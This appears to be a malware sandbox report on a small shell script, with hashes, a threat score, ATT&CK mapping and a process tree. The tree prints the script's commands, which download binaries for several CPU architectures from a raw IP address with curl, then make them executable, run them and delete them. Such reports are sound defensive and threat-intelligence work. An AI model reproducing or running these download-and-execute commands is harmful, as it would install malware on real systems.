bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520

Analysis

max time kernel
149s
max time network
150s
platform
debian-9_mips
resource
debian9-mipsbe-20240226-en
resource tags

arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
15-03-2024 20:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

exec.sh
Size

842B
MD5

4eeac4436b9c68f85b1c3a2bae62d3f3
SHA1

4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
SHA256

bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
SHA512

e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 5 IoCs

Processes:

386_binaryamd64_binaryarm_binaryarm64_binarymips_binary

ioc	pid	process
/tmp/386_binary	772	386_binary
/tmp/amd64_binary	807	amd64_binary
/tmp/arm_binary	812	arm_binary
/tmp/arm64_binary	817	arm64_binary
/tmp/mips_binary	822	mips_binary

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery
T1082

Processes:

mips_binary

description ioc process

File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size mips_binary

description	ioc	process
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	mips_binary

Reads runtime system information 6 IoCs

Reads data from /proc virtual filesystem.

Processes:

curlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/mips64_binary	curl
File opened for modification	/tmp/386_binary	curl
File opened for modification	/tmp/amd64_binary	curl
File opened for modification	/tmp/arm_binary	curl
File opened for modification	/tmp/arm64_binary	curl
File opened for modification	/tmp/mips_binary	curl

/tmp/exec.sh
/tmp/exec.sh
1⤵
PID:694

/usr/bin/curl
curl -o 386_binary http://5.10.249.153:9999/386
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:700

/bin/chmod
chmod +x 386_binary
2⤵
PID:771

/tmp/386_binary
./386_binary
2⤵
- Executes dropped EXE
PID:772

/bin/rm
rm -rf 386_binary
2⤵
PID:774

/usr/bin/curl
curl -o amd64_binary http://5.10.249.153:9999/amd64
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775

/bin/chmod
chmod +x amd64_binary
2⤵
PID:806

/tmp/amd64_binary
./amd64_binary
2⤵
- Executes dropped EXE
PID:807

/bin/rm
rm -rf amd64_binary
2⤵
PID:809

/usr/bin/curl
curl -o arm_binary http://5.10.249.153:9999/arm
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810

/bin/chmod
chmod +x arm_binary
2⤵
PID:811

/tmp/arm_binary
./arm_binary
2⤵
- Executes dropped EXE
PID:812

/bin/rm
rm -rf arm_binary
2⤵
PID:814

/usr/bin/curl
curl -o arm64_binary http://5.10.249.153:9999/arm64
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815

/bin/chmod
chmod +x arm64_binary
2⤵
PID:816

/tmp/arm64_binary
./arm64_binary
2⤵
- Executes dropped EXE
PID:817

/bin/rm
rm -rf arm64_binary
2⤵
PID:819

/usr/bin/curl
curl -o mips_binary http://5.10.249.153:9999/mips
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820

/bin/chmod
chmod +x mips_binary
2⤵
PID:821

/tmp/mips_binary
./mips_binary
2⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
PID:822

/bin/rm
rm -rf mips_binary
2⤵
PID:826

/usr/bin/curl
curl -o mips64_binary http://5.10.249.153:9999/mips64
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/386_binary
Filesize
16KB

MD5
8975168de4391197559b2f96e15fb056

SHA1
89ac1b3951d3ffdf5a86c518307645fcb3431228

SHA256
21ce8bef4ef651429ab50a7e748b2c33f07c4c3e4e8dfbb26a6e638e1b00438d

SHA512
0d177ab6ea136c6e945d51a5cc2c48af3c3dc29fcaf71ceeb47042b8aeef60164b6d4d9d1d4b85b56f345b4a6fea72043726d26765b1c509aeaafdfe09a6c820

Download Submit
/tmp/amd64_binary
Filesize
816KB

MD5
5ee7798fe4bb39b35ce9f710425ee4bb

SHA1
330347669e995bdf51baeae79188eed75c8c60ba

SHA256
02d52f896362869a3e885447857101742819d8fbc3ab478c6e9f4d7fc4805fc5

SHA512
ea9dcc87ea28c18db5ba0a6d9ae8737961e260f8e67f8dcff8bda97a8c75a6d68ceefd13651e4435c65b380add0f6f3797e0f1150d3d6788796d8433178b91f1

Download Submit
/tmp/arm64_binary
Filesize
44KB

MD5
63b89e43233dcaa7366b7cb46ed7424c

SHA1
2108c75082c408738bb5ddfab07aae7db5e2fa50

SHA256
3fcd72d0c272e41746c9ff31f29088e16a2ea7fd6259197907ec70720e1c8b4e

SHA512
583f7414c8d1e5289925786a88861b50e92b70c5934d4a5faff1a41fde8e201f66e763bac300ed4cf062957c2ec46699f64b221fc92d925e24ba04be32821254

Download Submit
/tmp/arm_binary
Filesize
436KB

MD5
ffb97d9ccd511fe0b32ff82b0d80e55e

SHA1
93ca73bff89bab2c9af14682126e50519a965b27

SHA256
7beda89d1c7f88be91bdca69a0f1d7dfac4f9e936f23b53f9d1f25af34cce646

SHA512
5858adfe5c356042a0624d0e67d4d1fff1c75b5dd36827f2720d4285f584dbd973fb760bbe09bf139e6da6088f9952d921c24b681388f523b511c4b4a154cbc3

Download Submit
/tmp/mips64_binary
Filesize
4KB

MD5
4cfbb8f1b2fcf8bf9b1d0c6b3912e27b

SHA1
c55d9b1f14156d86a1c98b8063817b38d1f370f3

SHA256
b384940943eddd69acd75088ca3b7c25fe0c921d6d233a0cdd89a3e02c405870

SHA512
a616c20e1a9d5ec1670a1810967dcdd39fcf885075ca4ba9c34fce9c2ad205a4f22ccb8ae23778c468796c5fbc6192afbc5ff8f5dd8ad711763068519691d5a7

Download Submit
/tmp/mips_binary
Filesize
516KB

MD5
ac7a872d0ed94926591bde3871f679de

SHA1
62b52e32c150cde4e167b251226f1ffa9ae01f74

SHA256
d5afc60887de99b8158368d459938cdf40373724851884c7c37f4f1c6092e3ef

SHA512
9b4f84ac869bb7f40721b28c2b3af5746def508038c15c431745df1c185213605b01148be66126b9f3c7f98e27681b0ba2b829f1f4595338a950de2673ff5b88

Download Submit